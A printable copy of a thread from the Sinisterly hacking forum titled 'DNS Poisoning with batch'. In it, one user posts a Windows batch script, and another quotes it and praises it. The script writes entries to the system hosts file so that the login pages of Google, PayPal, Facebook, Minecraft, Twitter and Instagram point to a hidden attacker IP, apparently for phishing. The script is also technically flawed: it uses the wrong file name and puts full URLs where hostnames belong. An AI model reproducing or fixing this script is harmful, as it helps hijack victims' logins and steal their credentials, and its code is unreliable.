Sinisterly
DNS Poisoning with batch - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Coding (https://sinister.ly/Forum-Coding)
+--- Forum: Coding (https://sinister.ly/Forum-Coding--71)
+--- Thread: DNS Poisoning with batch (/Thread-DNS-Poisoning-with-batch)

Pages: 1 2


RE: DNS Poisoning with batch - Deque - 04-25-2014

[Image: 5950f638d657e4931cc943cd336171afb1536669...fc59a0.jpg]


RE: DNS Poisoning with batch - Deque - 04-25-2014

[Image: 5950f638d657e4931cc943cd336171afb1536669...fc59a0.jpg]


RE: DNS Poisoning with batch - Inori - 04-28-2014

I adapted it so it hits all the following sites (the MD is just a redundancy):
-google accounts login
-paypal
-facebook login
-minecraft
-twitter login
-instagram login
Code:
@echo off title DNS poison color 05 mkdir C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://accounts.google.com/ServiceLogin?hl=en&continue=https://www.google.ca/ >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.paypal.com/ca/webapps/mpp/home >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.facebook.com/?stype=lo&jlou=AffALiXgLS5-Oe3cv_au3gKuivKkHdCvabRPhjkzQDdtsHPo7QDlfrGhaGUZMUxAF5Nmj2zCxLNEXMWxCYDj1yuX8eHOjkI1u5AWm2Pl6gUihw&smuh=28458&lh=Ac82g1LTt1W9RPO8 >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://minecraft.net/login >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.twitter.com >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://instagram.com/accounts/login/ >> C:\windows\system32\drivers\etc\hosts.txt exit
(all the x's are a hidden IP)


RE: DNS Poisoning with batch - ericsia97 - 06-01-2014

(04-28-2014, 02:35 PM)Jinxed Wrote: I adapted it so it hits all the following sites (the MD is just a redundancy):
-google accounts login
-paypal
-facebook login
-minecraft
-twitter login
-instagram login
Code:
@echo off title DNS poison color 05 mkdir C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://accounts.google.com/ServiceLogin?hl=en&continue=https://www.google.ca/ >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.paypal.com/ca/webapps/mpp/home >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.facebook.com/?stype=lo&jlou=AffALiXgLS5-Oe3cv_au3gKuivKkHdCvabRPhjkzQDdtsHPo7QDlfrGhaGUZMUxAF5Nmj2zCxLNEXMWxCYDj1yuX8eHOjkI1u5AWm2Pl6gUihw&smuh=28458&lh=Ac82g1LTt1W9RPO8 >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://minecraft.net/login >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://www.twitter.com >> C:\windows\system32\drivers\etc\hosts.txt echo xx.xxx.xx.xx https://instagram.com/accounts/login/ >> C:\windows\system32\drivers\etc\hosts.txt exit
(all the x's are a hidden IP)
This is awesome. Why still use X?